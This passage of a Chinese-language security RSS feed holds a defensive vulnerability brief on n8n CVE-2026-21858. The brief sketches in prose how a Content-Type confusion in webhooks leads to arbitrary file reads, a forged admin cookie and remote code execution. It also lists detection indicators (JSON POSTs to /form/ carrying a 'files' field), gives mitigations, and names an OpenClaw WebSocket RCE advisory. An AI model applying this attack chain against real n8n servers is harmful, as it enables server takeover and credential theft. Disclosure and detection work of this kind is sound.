239);"></td><td data-colwidth="211" width="245" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">Unauthenticated Local RCE via WebSocket config.apply</span></span></span></p></td><td data-colwidth="192" width="235" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;"><a href="https://github.com/openclaw/openclaw/security/advisories/GHSA-g55j-c2v4-pjcg" target="_blank">https://github.com/openclaw/openclaw/security/advisories/GHSA-g55j-c2v4-pjcg</a></span></span></span></p></td></tr></tbody></table><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1246e38f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511034%26idx%3D1%26sn%3D2166096437a964129f5dec744fff6793">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 04 Feb 2026 18:16:00 +0800</pubDate>
    </item>
    <item>
      <title>n8n远程代码执行漏洞简报（CVE-2026-21858）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511005&amp;idx=1&amp;sn=b5b4aa6ee28a9331ff4c0cf194b40db8</link>
      <description>n8n 在处理 Webhook 请求时存在“Content-Type 混淆”逻辑缺陷。攻击者可以通过发送特制的 JSON 请求（而非预期的 Multipart 请求）欺骗解析器，从而控制请求中的文件路径。</description>
      <content:encoded><![CDATA[<p><span>科恩DF小队</span> <span>2026-01-22 16:11</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d913af1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWUkdQIU0c1KKG9v6X415JbkbU7ibUeOxJoDTLhjJicm72UBZVLsiacveIG2gxKAZpicVhrMBUPjPiamgibw%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>n8n 在处理 Webhook 请求时存在“Content-Type 混淆”逻辑缺陷。攻击者可以通过发送特制的 JSON 请求（而非预期的 Multipart 请求）欺骗解析器，从而控制请求中的文件路径。</p>
  <div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mf53qk7t1bas" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">01</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf5250p18ao" style="font-size: 18px;" data-mpa-action-id="mf5250pb14bq" data-pm-slice="0 0 []">漏洞基本信息</span></p></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;font-size:16px;"><p><span data-font-family="default" mpa-font-style="mf51zshsqqe" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf520ieh1a09" data-mpa-action-id="mf520ieu1fob" data-pm-slice="0 0 []"><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞名称</span></span></span></p></li></ul><p style="text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;">CVE-2026-21858 (别名: Ni8mare)</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p><span data-font-family="default" mpa-font-style="mf51zshsqqe" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf520ieh1a09" data-mpa-action-id="mf520ieu1fob" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">漏洞发布时间</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshs5hh" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2026年1月7日</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p><span data-font-family="default" mpa-font-style="mf51zshs1cqa" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf520s571610" data-mpa-action-id="mf520s5l1m98" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">影响组件</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshs1jxh" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">n8n (工作流自动化平台)</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p><span data-font-family="default" mpa-font-style="mf51zshst6l" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf5210i216b1" data-mpa-action-id="mf5210ig1uw7" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">影响版本</span></span></span></p></li></ul><p style="text-align:left;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">      1.65.0 至 1.121.0 (不含 1.121.0)</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;"><p><span data-font-family="default" mpa-font-style="mf51zshs157v" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf521fn61tlk" data-mpa-action-id="mf521fnjt5e" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">披露渠道</span></span></span></p></li></ul><p style="text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshsa4m" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">Cyera Research Labs</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">博客</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#333333;background:undefined;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 10px;color: rgb(178, 178, 178);font-weight: bold;">[1]</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;font-size:14px;"><p style="text-align: left;"><span data-font-family="default" mpa-font-style="mf51zshs1kgr" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf522abs1gd1" data-mpa-action-id="mf522ac5od9" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">漏洞危害</span></span></span></p></li></ul><p style="text-align: left;text-indent: 2em;"><span data-font-family="default" mpa-font-style="mf51zshsp1i" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">严重 (Critical, CVSS 10.0)。攻击者无需认证即可</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">获取</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">管理员</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">权限</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">并</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">远程执行任意代码 (RCE)，完全接管服务器，窃取数据库凭证和配置密钥 。</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;font-size:14px;"><p><span data-font-family="default" mpa-font-style="mf51zshs1npu" style="font-size: 14px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;font-size: 16px;" mpa-font-style="mf522yaa18dl" data-mpa-action-id="mf522yao24lg" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">漏洞描述</span></span></span></p></li></ul><p style="text-indent: 2em;text-align: left;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mf51zshseyy"><span textstyle="" style="font-size: 14px;">n8n 在处理 Webhook 请求时存在“Content-Type 混淆”逻辑缺陷。攻击者可以通过发送特制的 JSON 请求（而非预期的 Multipart 请求）欺骗解析器，从而控制</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">请求中的</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">文件</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">路径</span></span></span><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">。这允许攻击者读取服务器上的任意文件（如配置文件和数据库），进而利用读取到的密钥伪造管理员 Cookie，最终通过执行命令节点获得服务器控制权 。</span></span></span></p><div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdeb7ech16ky" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">02</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf53uvudfii" style="font-size: 18px;" data-mpa-action-id="mf53uvuqdzw" data-pm-slice="0 0 []">排查方式</span></p></div></div></div></div></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-align: left;margin: 16px 0pt 0px;text-indent: 0px;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(51, 51, 51);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: bold;">异常请求头</span></span></span></p></li></ul><p style="text-align: left;margin: 0px 0pt 3pt;text-indent: 2em;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">检查发往  /form/ 端点的 POST 请求，其 Content-Type 不是 multipart/form-data (</span></span><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">漏洞</span></span><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">利用</span></span><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">为 application/json) 。   </span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-align: left;margin: 16px 0pt 0px;text-indent: 0px;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;font-weight: bold;">恶意 Payload 特征</span></span></span></p></li></ul><p style="text-align: left;margin: 0px 0pt 3pt;text-indent: 2em;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="">检查上述请求的 Body 中是否包含 &#34;files&#34; JSON 对象字段，这是利用漏洞的关键特征 。</span></span></p><div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdeb7ech16ky" data-pm-slice="4 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malurube3fq&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://mmbiz.qpic.cn/mmbiz_png/OxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ/640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">03</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf="" mpa-font-style="mf53uycm245v" style="font-size: 18px;" data-mpa-action-id="mf53uycw23jo" data-pm-slice="0 0 []">防护建议</span></p></div></div></div></div></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><h4 data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">漏洞缓解方式</span></span></span></h4></li></ul><p style="text-align: left;margin: 3pt 0pt;text-indent: 2em;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">在 n8n 配置中暂时禁用受影响的 Form 节点功能。</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="text-indent: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">修复建议</span></span></span></p></li></ul><p style="text-align: left;margin: 3pt 0pt;text-indent: 2em;" data-pm-slice="0 0 []"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">将 n8n 升级至 1.121.0 或更高版本。</span></span></span></p><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 